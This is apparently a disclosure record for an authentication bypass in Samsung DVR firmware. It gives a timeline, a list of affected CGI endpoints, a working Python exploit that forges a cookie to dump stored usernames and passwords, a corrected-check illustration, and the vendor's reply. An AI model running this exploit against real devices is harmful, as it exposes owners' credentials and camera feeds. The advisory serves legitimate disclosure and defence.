2013-08-22: Details reported to the vendor, awaiting the vendor's response
2013-08-23: Vendor confirmed; details disclosed to the vendor only
2013-08-26: Details opened to third-party security partners
2013-10-17: Details opened to core white hats and experts in the relevant field
2013-10-27: Details opened to regular white hats
2013-11-06: Details opened to intern white hats
2013-11-20: Details disclosed to the public
Samsung DVR, all versions below 1.10: remote access authentication bypass (exploit attached); exposes local camera configuration and content as well as login account names and passwords
The Samsung DVR runs Linux and exposes an internet-facing login interface. User cookies are validated by httpd and the CGI pages: the cookies DATA1 and DATA2 carry the base64-encoded username and password respectively. Because of a faulty validation in the CGI code, a cookie with any value at all is accepted. This allows reading, setting and deleting local users' usernames and passwords (cgi-bin/setup_user), and changing the DVR's and cameras' general configuration, device information, storage, the configured NTP server, and many other settings. The affected CGI interface addresses are:
/cgi-bin/camera_privacy_area
/cgi-bin/dev_camera
/cgi-bin/dev_devinfo
/cgi-bin/dev_devinfo2
/cgi-bin/dev_hddalarm
/cgi-bin/dev_modechange
/cgi-bin/dev_monitor
/cgi-bin/dev_pos
/cgi-bin/dev_ptz
/cgi-bin/dev_remote
/cgi-bin/dev_spotout
/cgi-bin/event_alarmsched
/cgi-bin/event_motion_area
/cgi-bin/event_motiondetect
/cgi-bin/event_sensordetect
/cgi-bin/event_tamper
/cgi-bin/event_vldetect
/cgi-bin/net_callback
/cgi-bin/net_connmode
/cgi-bin/net_ddns
/cgi-bin/net_event
/cgi-bin/net_group
/cgi-bin/net_imagetrans
/cgi-bin/net_recipient
/cgi-bin/net_server
/cgi-bin/net_snmp
/cgi-bin/net_transprotocol
/cgi-bin/net_user
/cgi-bin/rec_event
/cgi-bin/rec_eventrecduration
/cgi-bin/rec_normal
/cgi-bin/rec_recopt
/cgi-bin/rec_recsched
/cgi-bin/restart_page
/cgi-bin/setup_admin_setup
/cgi-bin/setup_datetimelang
/cgi-bin/setup_group
/cgi-bin/setup_holiday
/cgi-bin/setup_ntp
/cgi-bin/setup_systeminfo
/cgi-bin/setup_user
/cgi-bin/setup_userpwd
/cgi-bin/webviewer
Python test source:
#!/usr/bin/env python
#
# Samsung test
import urllib2
import re
import sys

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print "usage: %s [TARGET]" % sys.argv[0]
        sys.exit(1)

    ip = sys.argv[1]
    # Any DATA1 value is accepted by the flawed CGI check; this one is base64 of "aaaaaaaaaa"
    headers = {"Cookie": "DATA1=YWFhYWFhYWFhYQ=="}

    print "SAMSUNG DVR Authentication Bypass"
    print "Vulnerability and exploit by Andrea Fabrizi <[email protected]>\n"
    print "Target => %s\n" % ip

    # Dumping users: setup_user returns the user table as hidden form fields
    print "##### DUMPING USERS ####"
    req = urllib2.Request("http://%s/cgi-bin/setup_user" % ip, None, headers)
    response = urllib2.urlopen(req)
    user_found = False
    for line in response.readlines():
        exp = re.search(".*<input type=\'hidden\' name=\'nameUser_Name_[0-9]*\' value=\'(.*)\'.*", line)
        if exp:
            print exp.group(1),
        exp = re.search(".*<input type=\'hidden\' name=\'nameUser_Pw_[0-9]*\' value=\'(.*)\'.*", line)
        if exp:
            print ": " + exp.group(1)
            user_found = True
        exp = re.search(".*<input type=hidden name=\'admin_id\' value=\'(.*)\'.*", line)
        if exp:
            print "Admin ID => %s" % exp.group(1)

    if not user_found:
        print "No user found."
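As an added illustration (not code from this report or from Samsung's firmware), a Python 3 model of the cookie check the report describes: the flawed version accepts a request as soon as a DATA1 cookie is present, while the corrected version decodes DATA1/DATA2 and verifies them against a user store. The user store, salt and function names are assumptions made for the example.

```python
import base64
import binascii
import hashlib
import hmac
from http.cookies import SimpleCookie

# Constructed user store (assumption, not the DVR's real format):
# username -> salted SHA-256 digest of the password.
_SALT = b"constructed-salt"
USERS = {"admin": hashlib.sha256(_SALT + b"correct horse").digest()}

def make_cookie(user, password):
    """Cookie header a legitimate client sends: base64 username and password."""
    return "DATA1=%s; DATA2=%s" % (
        base64.b64encode(user.encode()).decode(),
        base64.b64encode(password.encode()).decode(),
    )

def _b64_field(cookies, name):
    """Base64-decode cookie `name`; None if absent or not valid base64/UTF-8."""
    morsel = cookies.get(name)
    if morsel is None:
        return None
    try:
        return base64.b64decode(morsel.value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None

def flawed_is_authenticated(cookie_header):
    """Model of the reported flaw: the request passes as soon as DATA1 is present,
    whatever its value, so the DATA1=YWFhYWFhYWFhYQ== cookie from the script works."""
    return "DATA1" in SimpleCookie(cookie_header)

def fixed_is_authenticated(cookie_header):
    """Corrected check: decode both fields, require a known user, and compare the
    password digest in constant time."""
    cookies = SimpleCookie(cookie_header)
    user = _b64_field(cookies, "DATA1")
    password = _b64_field(cookies, "DATA2")
    if user is None or password is None or user not in USERS:
        return False
    candidate = hashlib.sha256(_SALT + password.encode("utf-8")).digest()
    return hmac.compare_digest(USERS[user], candidate)

if __name__ == "__main__":
    bypass = "DATA1=YWFhYWFhYWFhYQ=="  # the cookie the test script above sends
    print("flawed check, bypass cookie:", flawed_is_authenticated(bypass))  # True
    print("fixed check, bypass cookie: ", fixed_is_authenticated(bypass))   # False
    print("fixed check, valid login:   ",
          fixed_is_authenticated(make_cookie("admin", "correct horse")))  # True
```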
Severity: Low
Vulnerability Rank: 3
Confirmed: 2013-08-23 08:58
Thank you for your attention to Samsung products. Our company has already discovered this vulnerability, and a fix is in progress.
None